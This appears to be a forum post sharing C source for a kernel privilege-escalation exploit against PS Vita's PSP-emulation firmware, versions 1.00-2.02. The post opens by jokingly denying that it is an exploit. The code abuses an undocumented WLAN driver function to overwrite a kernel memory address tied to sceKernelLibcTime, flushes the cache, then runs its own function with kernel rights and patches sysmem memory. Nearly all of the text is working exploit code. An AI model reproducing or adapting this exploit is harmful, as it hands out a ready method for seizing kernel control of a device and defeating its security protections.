It's not an kxploit for 1.00-2.02 vita firmwares :D

int sceWlanDrv_lib_B5E7B187(void);
int sceWlanDrv_lib_51B0BBB8(u32, u32, u32, u32);

// Code with krights
int kernel_function()
{
    // Repair sysmem
    // why did it broke too much of memory?
    _sw(0x0A003DBE, 0x8800F710); // j loc_0800F6F8 (2.02 value)
    _sw(0x0200D821, 0x8800F714); // move $k1, $s0
    _sw(0x3C038801, 0x8800F718); // lui $v1, 0x8801
    _sw(0x8C654384, 0x8800F71C); // lw $a1, 0x4384($v1)

    //-------
    // What the fuck are you doing in the kernel memory?! :D
    //-------

    return 0;
}

// Loading required modules (Net modules)
u32 i;
for(i = 1; i <= 6; i++) sceUtilityLoadModule(i + 0xFF);

// Set 0 to global variable. Just kicking global variable checking in the next function.
sceWlanDrv_lib_B5E7B187();
// Overwrite 0x8800F71C address (sceKernelLibcTime local argument setting).
sceWlanDrv_lib_51B0BBB8(0, 0, 0, 0x8800F71C);

// Flush data cache
sceKernelDcacheWritebackAll();

// Exec kernel function with vfpu enabled, thx to liquid
int execute_with_vfpu_enabled(){ sceKernelLibcTime(0, (void *)((u32)kernel_function | 0x80000000)); return 0; }
SceUID thid = sceKernelCreateThread("VFPU", &execute_with_vfpu_enabled, 0x18, 0x1000, PSP_THREAD_ATTR_USER | PSP_THREAD_ATTR_VFPU , NULL);
sceKernelStartThread(thid, 0, NULL);
sceKernelWaitThreadEnd(thid, NULL);